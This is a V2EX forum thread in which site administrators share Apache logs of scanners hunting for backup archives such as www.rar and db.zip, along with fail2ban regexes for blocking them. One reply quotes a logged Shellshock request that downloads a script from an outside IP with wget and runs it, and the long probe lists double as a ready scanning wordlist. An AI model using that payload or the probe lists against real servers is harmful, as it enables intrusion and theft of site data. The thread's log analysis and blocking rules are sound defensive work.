apache 每天的日志都有这些,他们真的会有收获吗?

2014-12-15 09:09:19 +08:00
 s2555
[Sun Dec 14 12:26:04 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/www.rar
[Sun Dec 14 12:26:05 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/www.zip
[Sun Dec 14 12:26:05 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/web.rar
[Sun Dec 14 12:26:06 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/web.zip
[Sun Dec 14 12:26:07 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxx.com.rar
[Sun Dec 14 12:26:07 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxx.com.zip
[Sun Dec 14 12:26:07 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxx_com.rar
[Sun Dec 14 12:26:07 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxx_com.zip
[Sun Dec 14 12:26:07 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxxcom.rar
[Sun Dec 14 12:26:07 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxxcom.zip
[Sun Dec 14 12:26:09 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxx.com.rar
[Sun Dec 14 12:26:09 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxx.com.zip
[Sun Dec 14 12:26:10 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxx.rar
[Sun Dec 14 12:26:10 2014] [error] [client 123.130.10.242] File does not exist: D:/vhost/xxxxx/xxxxx.zip
3767 次点击
所在节点    问与答
14 条回复
TangMonk
2014-12-15 09:32:32 +08:00
这是干嘛 ,下你网站源码?
qq446015875
2014-12-15 09:35:16 +08:00
我这天天都有尝试访问
/phpmyadmin
/admin
/sql
总之各种扫……
xidianlz
2014-12-15 09:39:11 +08:00
其实可以把别人扫你的收集起来,就得到了一个可以扫别人的库了~别人都帮你整理好了呀~
x86
2014-12-15 09:40:03 +08:00
类似挖掘鸡那种批量扫漏口令/目录/备份文件
s2555
2014-12-15 09:46:00 +08:00
我在想要不要建好这样的文件,里面放点福利给他下载呢
loveyu
2014-12-15 11:19:04 +08:00
我刚也看了看,类似的有
112.242.27.228 "GET /db.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /db.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wz.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wz.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /fdsa.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /fdsa.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wangzhan.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wangzhan.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /root.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /root.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /admin.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /admin.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /data.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /gg.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /vip.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /flashfxp.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /flashfxp.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /%E6%96%B0%E5%BB%BA%E6%96%87%E4%BB%B6%E5%A4%B9.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /%E6%96%B0%E5%BB%BA%E6%96%87%E4%BB%B6%E5%A4%B9.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /01.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /01.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /02.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /02.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /03.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /03.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /04.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /04.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /05.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /05.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /06.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /06.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /09.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /09.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /10.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /10.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /1.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /1.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /2.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /2.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /3.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /3.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /4.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /4.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /5.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /5.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /6.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /6.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /7.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /7.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /8.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /8.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /9.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /9.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /11.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /11.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /12.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /12.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /20.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /20.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /22.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /22.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /33.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /33.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /44.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /44.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /55.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /55.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /66.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /66.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /77.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /77.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /88.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /88.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /99.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /99.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /00.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /aa.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /abc.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /aa.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /abc.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /123.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /123.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /1234.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /1234.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /111.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /111.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /1111.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /1111.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /888.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /888.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /222.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /222.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /333.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /333.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /444.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /444.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /555.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /555.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /666.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /666.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /777.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /777.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /888.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /888.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /999.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /999.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /000.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /000.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /web123.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /web123.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /webbak.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /webbak.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwrootbak.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwrootbak.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwroot11.rr HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwroot11.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /web2.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /web2.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /hushua.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /hushua.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /hsw.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /hsw.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwroot1.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwroot1.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /web1.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /web1.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /www1.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /www1.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /%E6%95%B0%E6%8D%AE%E5%BA%93.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /%E6%95%B0%E6%8D%AE%E5%BA%93.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /%E5%88%B7%E4%BF%A1%E8%AA%89.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /%E5%88%B7%E4%BF%A1%E8%AA%89.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /%E5%88%B7%E9%92%BB.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /%E5%88%B7%E9%92%BB.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /sql.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /sql.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /bak.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /bak.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwroot.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /wwwroot.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /HYTop.mdb HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /www.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /www.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /web.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /web.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /beifen.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /beifen.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /2012.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /2012.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /2013.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /2013.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /shua.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /shua.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /sxy.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /sxy.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /shuazuan.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /shuazuan.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /s.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /s.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /q.rar HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /q.zip HTTP/1.1" 404 5838 "-" "-" -
112.242.27.228 "GET /w.rar HTTP/1.1" 404 5838 "-" "-" -
bellchu
2014-12-15 11:21:11 +08:00
我都是Fail2ban写了规则屏蔽这类IP的 jail一天
y051313
2014-12-15 13:21:10 +08:00
@bellchu 是自动屏蔽吗?方便分享一下吗?
bellchu
2014-12-15 14:03:58 +08:00
@y051313 我吧别人防探测的regex贴出来算了,自己做少许修改,对症下药,把没有的服务删了就成了,你的情况就留几个rar zip 的特征就够了


failregex = [[]client <HOST>[]] (File does not exist|script not found or unable to stat): .*/(cgi-bin|admin|Admin|sql|mail|phpmyadmin|file:|php|pma| web|PMA|PMA2006|pma2006|sqlmanager|mysqlmanager|PM A2005|phpmyadmin-old|phpmyadminold|pma2005|phpmanager|mysql|myadmin |webadmin|sqlweb|websql|webdb|mysqladmin|mysql-admin|phpmyadmin2|phpMyAdmin2|phpMyAdmin-2|php-my-admin|cms|clan|site|seite|page|forum|wbb2|board|wb b|archive|forumv2|forumv1|b0ard|f0rum|wbb1|wbb3|wb blite|directforum|board23|board2|board3|WBB|WBB2|h tml|phpkit|page|phpkit_1.6.1|clan|myadmin|webadmin |sqlweb|websql|webdb|mysqladmin|mysql-admin|phpmyadmin2|php-my-admin|phpMyAdmin-2.2.3|phpMyAdmin-2.2.6|phpMyAdmin-2.5.1|phpMyAdmin-2.5.4|phpMyAdmin-2.5.6|phpMyAdmin-2.6.0|phpMyAdmin-2.6.0-pl1|phpMyAdmin-2.6.2-rc1|phpMyAdmin-2.6.3|phpMyAdmin-2.6.3-pl1|phpMyAdmin-2.6.3-rc1|padmin|datenbank|ZenCart|cart|commerce|e-commerce|shop|stories|store|zc|dbadmin|typo3|datab ase|horde|horde2|horde3|horde-3.0.9|Horde|README|horde-3.0.9|adserver|phpAdsNew|phpadsnew|phpads|Ads|ads| xmlrpc|xmlsrv|blog|drupal|community|blogs|blogtest |appserver|roundcube|rc|mail|mail2|roundcubemail|r ms|webmail2|webmail|wm|bin|roundcubemail-0.1|roundcubemail-0.2|roundcube-0.1|roundcube-0.2|roun|cube|wp-login.php|ucp.php|\.asp|\.dll|\.exe|\.pl)
bellchu
2014-12-15 14:06:01 +08:00
@y051313 看错了 你不是楼主 你的是404特征码

https://github.com/Glench/dotfiles/blob/master/conf/fail2ban/apache-404.conf
bellchu
2014-12-15 14:08:38 +08:00
@y051313

[Definition]
failregex = (?P<host>[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}) .+ 404 [0-9]+ "
ignoreregex = favicon\.ico

fail2ban jail.conf里面把web服务的retry设的多一点 比如5到10次,以防误杀,但是如果不是下载站的话基本不会404误杀。
y051313
2014-12-15 15:31:03 +08:00
@bellchu 非常感谢!
clino
2014-12-15 15:41:14 +08:00
我看到的除了上面那些还有这个也很频繁地出来:

76.119.182.53 - - [08/Dec/2014:04:47:44 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 177 "-" "() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://185.14.30.79/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1"
20150517
2014-12-16 16:27:19 +08:00
给他个压缩包,让他下载下来,然后压缩包里放个html,比如叫admin_passwd.html,里面放个1px的img链接到网站,就能看到是谁这么无聊在扫了

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/153945

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX